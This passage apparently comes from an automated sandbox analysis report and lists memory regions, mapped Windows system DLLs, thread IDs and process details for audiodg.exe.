"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37868 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37869 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37870 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37871 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37872 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 37873 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37874 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37875 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37876 start_va = 0x280000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37877 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = 
"\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37878 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37879 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37880 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37881 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37882 start_va = 0x100000 end_va = 0x11cfff entry_point = 0x100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37883 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 37884 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 37885 start_va = 0x100000 end_va = 0x11cfff entry_point = 0x100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37886 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37887 start_va = 0x763d0000 end_va = 0x7649bfff 
entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37888 start_va = 0x100000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 37889 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 37890 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37891 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 37892 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 37893 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 37894 start_va = 0x4d0000 end_va = 0x8c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 37895 start_va = 0x8d0000 end_va = 0x92bfff entry_point = 0x8d0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37896 start_va = 0x8d0000 end_va = 0x92bfff entry_point = 0x8d0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37897 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37905 start_va = 0x910000 end_va = 0x94ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000910000" filename = "" Region: id = 37906 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37907 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37917 start_va = 0x8d0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 37918 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 37919 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37920 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37927 start_va = 0xb80000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 37928 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37929 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37930 start_va = 0x741f0000 end_va = 0x74201fff entry_point = 0x741f0000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 37931 start_va = 0x74210000 end_va = 0x74216fff entry_point = 0x74210000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" 
(normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 38035 start_va = 0xeb0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 38036 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38039 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 38040 start_va = 0x74090000 end_va = 0x74122fff entry_point = 0x74090000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 38041 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38042 start_va = 0x752e0000 end_va = 0x752f5fff entry_point = 0x752e0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 38043 start_va = 0x77730000 end_va = 0x77774fff entry_point = 0x77730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 38044 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 38045 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 38046 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") 
Region: id = 38047 start_va = 0x75b50000 end_va = 0x75b56fff entry_point = 0x75b50000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 38048 start_va = 0x74080000 end_va = 0x7408ffff entry_point = 0x74080000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 38049 start_va = 0x950000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 38050 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 38051 start_va = 0xa10000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 38052 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 38053 start_va = 0xef0000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 38054 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38055 start_va = 0x74050000 end_va = 0x7407afff entry_point = 0x74050000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 38056 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38057 start_va = 0x75300000 end_va = 0x75316fff entry_point = 0x75300000 region_type 
= mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 38058 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38059 start_va = 0x771b0000 end_va = 0x77206fff entry_point = 0x771b0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 38060 start_va = 0x74030000 end_va = 0x74043fff entry_point = 0x74030000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 38093 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 38094 start_va = 0x1060000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 38095 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 38096 start_va = 0x73f60000 end_va = 0x73f6bfff entry_point = 0x73f60000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 38097 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 38098 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38099 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = 
mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38100 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38101 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38102 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38103 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38104 start_va = 0x9b0000 end_va = 0x9ebfff entry_point = 0x9b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38105 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38106 start_va = 0xef0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 38111 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38112 start_va = 0x73f50000 end_va = 0x73f58fff entry_point = 0x73f50000 region_type = mapped_file name = "dsrole.dll" filename = 
"\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 38113 start_va = 0x73f40000 end_va = 0x73f49fff entry_point = 0x73f40000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 38114 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 38115 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 38174 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 38175 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 38176 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 38177 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38220 start_va = 0x1190000 end_va = 0x12adfff entry_point = 0x1190000 region_type = mapped_file name = "aero.msstyles" filename = "\\Windows\\Resources\\Themes\\Aero\\aero.msstyles" (normalized: "c:\\windows\\resources\\themes\\aero\\aero.msstyles") Region: id = 38221 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38222 start_va = 0xa90000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 38223 start_va = 0x1190000 end_va = 0x1b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" 
Region: id = 38224 start_va = 0x1b90000 end_va = 0x258ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 38225 start_va = 0x2590000 end_va = 0x266efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 38228 start_va = 0x1190000 end_va = 0x126efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 38229 start_va = 0x1190000 end_va = 0x126efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 38431 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 38432 start_va = 0x75060000 end_va = 0x75080fff entry_point = 0x75060000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 38433 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38436 start_va = 0x72b40000 end_va = 0x72b4efff entry_point = 0x72b40000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 38437 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 38438 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 38441 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 38510 start_va = 0x1260000 end_va = 0x129ffff entry_point = 0x0 
region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 38511 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38524 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 38525 start_va = 0x74600000 end_va = 0x7460cfff entry_point = 0x74600000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 38526 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 38529 start_va = 0x73ee0000 end_va = 0x73f26fff entry_point = 0x73ee0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 38547 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 38548 start_va = 0x950000 end_va = 0x95bfff entry_point = 0x950000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 38549 start_va = 0x960000 end_va = 0x963fff entry_point = 0x960000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 38609 start_va = 0x950000 end_va = 0x95bfff entry_point = 0x950000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 38610 start_va = 0x1320000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: 
id = 38611 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 38612 start_va = 0x960000 end_va = 0x963fff entry_point = 0x960000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 38846 start_va = 0x74bc0000 end_va = 0x74bd1fff entry_point = 0x74bc0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 38855 start_va = 0x12e0000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 38856 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Thread: id = 1151 os_tid = 0x360 Thread: id = 1153 os_tid = 0x368 Thread: id = 1156 os_tid = 0x374 Thread: id = 1157 os_tid = 0x378 Thread: id = 1158 os_tid = 0x37c Thread: id = 1161 os_tid = 0x388 Thread: id = 1174 os_tid = 0x3c0 Thread: id = 1177 os_tid = 0x3cc Thread: id = 1180 os_tid = 0x3d8 Thread: id = 1185 os_tid = 0x3ec Thread: id = 1191 os_tid = 0x408 Thread: id = 1192 os_tid = 0x40c Thread: id = 1203 os_tid = 0x438 Thread: id = 1204 os_tid = 0x43c Thread: id = 1212 os_tid = 0x460 Thread: id = 1213 os_tid = 0x464 Thread: id = 1230 os_tid = 0x4b4 Process: id = "676" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x7f1d11e0" os_pid = "0x398" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "672" os_parent_pid = "0x2b0" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2e0" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac58" [0xc000000f], "LOCAL" [0x7] Region: id = 37949 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37950 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 37951 start_va = 0x6d0000 end_va = 0x6edfff entry_point = 0x6d0000 region_type = mapped_file name = "audiodg.exe" filename = "\\Windows\\System32\\audiodg.exe" (normalized: "c:\\windows\\system32\\audiodg.exe") Region: id = 37952 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37953 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37954 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37955 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 37956 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37957 start_va = 0x170000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 37958 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type 
= mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37959 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37960 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37961 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37962 start_va = 0x20000 end_va = 0x86fff entry_point = 0x20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37963 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37964 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37965 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 37966 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37967 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" 
(normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37968 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37969 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37970 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37971 start_va = 0x74ac0000 end_va = 0x74bb4fff entry_point = 0x74ac0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 37972 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37973 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 37974 start_va = 0x90000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37975 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37976 start_va = 0xb0000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 37977 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = 
